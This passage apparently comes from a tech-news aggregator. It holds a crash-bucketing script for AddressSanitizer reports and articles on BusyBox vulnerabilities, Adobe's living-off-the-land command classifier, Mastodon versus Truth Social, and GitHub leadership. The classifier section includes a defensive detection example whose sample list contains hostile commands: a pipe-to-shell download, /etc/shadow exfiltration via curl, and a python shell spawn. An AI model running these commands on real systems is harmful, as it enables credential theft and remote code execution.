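    "id:000003": (b"B" * 40, """\
==13==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd00000100
WRITE of size 8 at 0x7ffd00000100 thread T0
    #0 0x4f3300 in format_output hypothetical_applet.c:212
    #1 0x4f0c10 in applet_main hypothetical_applet.c:150
    #2 0x4e9aa0 in main busybox.c:40
"""),
}

def parse_report(report):
    """Return (error kind, [(function, file), ...]); addresses and line numbers are
    dropped so crashes at neighbouring lines of one function share a signature."""
    kind = ASAN_KIND.search(report)
    frames = [(m.group(1), m.group(2)) for m in ASAN_FRAME.finditer(report)]
    return (kind.group(1) if kind else "unknown"), frames

def signature(kind, frames, depth=3):
    """Short hash of the error kind plus the top `depth` frames."""
    sig = kind + "|" + "|".join(f"{fn}@{src}" for fn, src in frames[:depth])
    return hashlib.sha256(sig.encode()).hexdigest()[:12]

def bucket(crashes, depth=3):
    """Map signature -> crash ids sharing it (same presumed root cause)."""
    groups = defaultdict(list)
    for cid, (_, report) in crashes.items():
        kind, frames = parse_report(report)
        groups[signature(kind, frames, depth)].append(cid)
    return dict(groups)

def representatives(crashes, depth=3):
    """One crash id per bucket: the shortest input is the cheapest to minimise."""
    return {sig: min(ids, key=lambda cid: len(crashes[cid][0]))
            for sig, ids in bucket(crashes, depth).items()}

if __name__ == "__main__":
    for sig, ids in bucket(CRASHES).items():
        print(sig, ids)
    print(representatives(CRASHES))
```

Lowering `depth` merges more aggressively (only the faulting function is compared); raising it keeps crashes with different callers apart.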

Threat Analysis and mitigation advice

To assess the threat level posed by these vulnerabilities, Team82 and JFrog inspected JFrog's database of more than 10,000 embedded firmware images. The team found that 40% of them contained a BusyBox executable file that is linked with one of the affected applets, making these issues extremely widespread among Linux-based embedded firmware.

According to Claroty, all 14 vulnerabilities have been fixed in BusyBox 1.34.0 and users are urged to upgrade immediately.

See more here:

Claroty and JFrog discover 14 vulnerabilities in Busybox - SecurityBrief New Zealand

Open Source Project Aims to Detect Living-Off-the-Land Attacks – Dark Reading

Attackers who use standard system commands during a compromise, a technique known as living off the land (LotL) to avoid detection by defenders and endpoint security software, may find their activities in the spotlight if a machine learning project open sourced by software firm Adobe this week bears fruit.

The project, dubbed LotL Classifier, uses supervised learning and an open source dataset of real-world attacks to extract features from specific commands, and then classifies each command based on features extracted with human analysis as the model. Those features are used to determine whether the command is good or bad and to label the command with a set of tags that can be used for anomaly detection.

Each feature by itself, such as accessing /etc/shadow, where password hashes are typically stored, or access to Pastebin, may seem suspicious but usually is not malicious, says Andrei Cotaie, technical lead for security intelligence and engineering at Adobe.

"On their own, most of the tags or tag types have a high FP [false positive] rate, but combining them and feeding this combination through the machine learning algorithm can generate a higher rate of accuracy in the classifier," he says, adding that Adobe has benefited from the machine learning model. "The LotL Classifier is operational in our environment and based on our experience, by suppressing reoccurring alerts, the LotL Classifier generates a few alerts per day."

Living off the land has become a widely used attacker tactic when targeting enterprises. Malware attacks are just as likely to begin with a PowerShell command or Windows Scripting Host command, two common administrative tools that can escape notice, as with a more traditional malware executable. In 2019, CrowdStrike's incident response group found that "malware-free" attacks, another name for LotL, surpassed malware-based incidents. By the summer of 2021, they accounted for more than two-thirds of investigated incidents.

"Attackers are increasingly attempting to accomplish their objectives without writing malware to the endpoint, using legitimate credentials and built-in tools (living off the land) which are deliberate efforts to evade detection by traditional antivirus products," CrowdStrike stated in its "2021 Threat Hunting Report."

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools.

The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell.

"The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. "Then they quickly browse through the parameters and, if present in the command, they look at domain names, IP addresses, and port numbers."

Using those tags, the LotL Classifier uses a random-forest tree model that combines several decision trees to determine whether the code is malicious or legitimate.
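The tag extraction and tag combination described above, as an added example that is not Adobe's LotL Classifier code: it derives tags from the binaries in command position, sensitive paths, shell-spawn patterns and network indicators, then combines them with a hand-written rule in place of the random forest. Word lists, thresholds and the sample command lines are constructed for illustration.

```python
import os
import re
import shlex

# Added example, not Adobe's LotL Classifier code: tag extraction over the feature
# categories the article names (binaries, keywords, patterns, paths, network info)
# and a hand-written combination rule standing in for the random-forest model.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SEPARATORS = {"|", "||", ";", "&&", "&"}
BINARY_TAGS = {"keyword:script_interpreter": {"python", "python3", "perl", "ruby", "php"},
               "keyword:downloader": {"curl", "wget"}}  # earned by a binary in command position
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PORT_RE = re.compile(r":(\d{2,5})\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|ru|ee)\b")  # constructed TLD list
TEXT_TAGS = [  # (tag, predicate over the lower-cased command line)
    ("path:sensitive", lambda s: any(p in s for p in ("/etc/shadow", "/root/.ssh"))),
    ("net:paste_site", lambda s: any(p in s for p in ("pastebin.com", "paste.ee"))),
    ("pattern:shell_spawn", lambda s: "pty.spawn" in s or "/bin/sh" in s),
    ("net:ip", IP_RE.search), ("net:port", PORT_RE.search), ("net:domain", DOMAIN_RE.search),
]
HIGH = {"pattern:pipe_to_shell", "pattern:shell_spawn"}          # strong signal alone
MEDIUM = {"path:sensitive", "net:ip", "net:port", "net:domain", "net:paste_site",
          "keyword:script_interpreter", "keyword:downloader"}    # high FP rate alone

def tokenize(cmd):
    """Split like a POSIX shell, keeping |, ;, && and friends as separate tokens."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        return list(lexer)
    except ValueError:              # unbalanced quotes: degrade to a whitespace split
        return cmd.split()

def extract_tags(cmd):
    """Return the set of feature tags for one command line."""
    tags, expect_cmd, prev_sep = set(), True, None
    for tok in tokenize(cmd):
        if tok in SEPARATORS:
            expect_cmd, prev_sep = True, tok
        elif expect_cmd:            # token in command position: it names the binary
            name = os.path.basename(tok)
            tags.add("binary:" + name)
            tags.update(t for t, names in BINARY_TAGS.items() if name in names)
            if name in SHELLS and prev_sep == "|":
                tags.add("pattern:pipe_to_shell")   # e.g. "curl ... | sh"
            expect_cmd, prev_sep = False, None
    low = cmd.lower()
    tags.update(tag for tag, pred in TEXT_TAGS if pred(low))
    return tags

def classify(cmd):
    """Combine tags into (verdict, score, tags). Single tags score low; a sensitive
    path together with any network indicator is boosted as an exfiltration shape."""
    tags = extract_tags(cmd)
    score = 3 * len(tags & HIGH) + len(tags & MEDIUM)
    if "path:sensitive" in tags and any(t.startswith("net:") for t in tags):
        score += 3
    verdict = "bad" if score >= 4 else "suspicious" if score >= 2 else "good"
    return verdict, score, sorted(tags)

SAMPLE_COMMANDS = [  # constructed, not from the Adobe dataset
    "grep -rn TODO ./src",
    "cat /etc/shadow",
    "wget https://pastebin.com/raw/abcd -O /tmp/p.txt",
    "curl -s http://203.0.113.7:8080/x.sh | sh",
    "cat /etc/shadow | curl -d @- http://203.0.113.7/up",
    "python3 -c 'import pty; pty.spawn(\"/bin/sh\")'",
]
```

Running `classify` over `SAMPLE_COMMANDS` shows the point Cotaie makes: reading /etc/shadow alone stays "good", the Pastebin download is only "suspicious", and the combinations (download piped into a shell, sensitive file plus a network destination) score "bad".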

"Interestingly, these stealthy moves are exactly why it's often very difficult to determine which of these actions are a valid system administrator and which are an attacker," the company stated in a blog post.

The machine learning model can benefit companies in a variety of threat-analysis pipelines, says Adobe's Cotaie. Threat hunters could use it as a local service or the model could process global security information and event management (SIEM) data to find anomalies by feeding another open source tool released by Adobe, the One-Stop Anomaly Shop (OSAS). The model has a component for Windows systems and a separate one for Linux, but it's otherwise context independent.

"The classifier is integrated into ... One Stop Anomaly Shop (OSAS)," he says. "The parent project can model local or group system behavior using many context-dependent features and its anomaly detection features are complementary to the LotL classifier model."

Read the original post:

Open Source Project Aims to Detect Living-Off-the-Land Attacks - Dark Reading

Mastodon puts Trump's social network on notice for improperly using its code – The Verge

Mastodon has sent former President Donald Trump's company a formal notification that it's breaking the rules by using Mastodon's open-source code to build its social network, named Truth. This news comes from a blog post by Mastodon's founder Eugen Rochko, but others have previously pointed out that the organization behind Truth, the Trump Media and Technology Group (or TMTG), was violating Mastodon's software license by not providing the source code for the site built on top of it. Trump's group has 30 days from when the letter was sent to comply with the license or stop using the software, or it could lose the right to do so.

While Truth hasn't officially launched yet, internet users discovered that a test version basically had the same interface as Mastodon, and that some of the code for the site was unchanged from the other social network's code. By itself, that's actually the intended use of open-source software, but as the Software Freedom Conservancy pointed out last week, apps or websites based on software that uses the AGPLv3 license have to in turn provide their own source code. According to the foundation that wrote AGPL, it's meant to make the community's software better: if you improve on something that someone else made, they should be able to benefit from your work like you did theirs.

As Mastodon and Rochko reiterated on Friday, though, TMTG hasn't done that; it even went as far as to call its software proprietary, and seemingly tried to hide the fact that it was based on Mastodon. Now that the Truth has been revealed, however, TMTG will either have to rebuild it without using Mastodon's code (a tall order, as bootstrapping a social network site isn't particularly easy) or release its source code and change the terms of service.

It's not the first time Mastodon has had to deal with, as Rochko puts it, "people so antithetical to [its] values" trying to build on top of its open-source platform. In 2019 Gab, a social network known for getting banned from almost everything due to how many toxic users it had, decided it would use Mastodon as a backend. Unlike that situation, though, where Gab wasn't really breaking any rules (at least regarding its use of the software), Truth is violating the AGPL by using Mastodon's code in an unauthorized way. How TMTG will deal with the gauntlet now that it's been thrown down (twice) is anyone's guess, but it'll have to respond unless it wants to open itself up to possible legal action.

Trump Media and Technology Group didn't immediately respond to a request for comment.

Read more:

Mastodon puts Trump's social network on notice for improperly using its code - The Verge

Microsoft's GitHub CEO Nat Friedman is stepping down, product chief Thomas Dohmke will replace him – CNBC

From left, GitHub CEO Chris Wanstrath, Microsoft CEO Satya Nadella and future GitHub CEO Nat Friedman at GitHub headquarters in San Francisco.

Source: Microsoft

Microsoft said Wednesday that Nat Friedman, CEO of the company's GitHub subsidiary that provides software for storing source code, is stepping down. Thomas Dohmke, GitHub's product chief, will replace him.

The announcement comes weeks after one of GitHub's most prominent competitors, GitLab, went public on the Nasdaq. Following the debut, GitLab was worth $16.5 billion, more than two times what Microsoft paid for GitHub in 2018.

"As Chief Product Officer, I'm proud of the work our teams have done to bring new capabilities to GitHub Codespaces, Issues, Copilot, and many of the 20,000 improvements that we shipped last year," Dohmke wrote in a blog post. "Together, we've built a roadmap that will transform the developer experience for open source maintainers and enterprises using GitHub for years to come."

Dohmke takes over for Friedman on Nov. 15.

Friedman is "very excited to go back to my startup roots to support and invest in the builders who are creating the world of tomorrow," he wrote in a tweet. He will be an advisor to both GitHub and Microsoft, Scott Guthrie, executive vice president for Microsoft's cloud and artificial intelligence group, wrote in an email to employees.

Before becoming the top leader of GitHub, Friedman had been co-founder and CEO of Xamarin, a start-up that built cross-platform mobile development tools. Microsoft acquired Xamarin in 2016 and made Friedman a corporate vice president for developer services. Then in 2018, after Microsoft closed the GitHub acquisition, it tapped Friedman to run the subsidiary. His appointment came months after co-founder Chris Wanstrath stepped down as CEO.

Dohmke first registered as a GitHub user in 2009, not long after its founding in 2008. He was co-founder and CEO of app-testing software start-up HockeyApp, which Microsoft acquired in 2014. He moved to GitHub at the time Microsoft closed the GitHub acquisition in 2018.

Dohmke "led the GitHub acquisition process on the Microsoft engineering side from the deal signing to the successful acquisition close," Guthrie wrote in his email. Dohmke later led the acquisitions of Npm, a code-distribution start-up, and Semmle, a start-up whose software helps organizations analyze code to uncover security issues, Guthrie wrote.

Since the acquisition, Friedman has reported to Guthrie. Once Dohmke takes the helm at GitHub, he will report to Julia Liuson, a 29-year Microsoft veteran who is becoming president of Microsoft's developer division.

In the Friedman years, GitHub came out with new features and enhanced existing ones. Perhaps the largest announcement was the introduction in June of GitHub Copilot, a system that draws on code posted online to suggest new code for developers to add to their projects. The feature remains available to a limited number of users, and people often show off its abilities on social media.

Microsoft does not disclose GitHub revenue, but the company does occasionally provide updates on the size of the service's user base. Over 73 million developers are using GitHub today, up from 28 million when Microsoft announced its plan to buy GitHub.

GitHub's challengers have gotten bigger, too. In 2019 Atlassian said its Bitbucket Cloud service had reached 10 million registered users. And GitLab, which said in the prospectus for its initial public offering that its "principal competitor is Microsoft Corporation following their acquisition of GitHub," estimates that it has 30 million registered users. GitLab said revenue grew 69% year over year in the quarter that ended July 31.


See more here:

Microsoft's GitHub CEO Nat Friedman is stepping down, product chief Thomas Dohmke will replace him - CNBC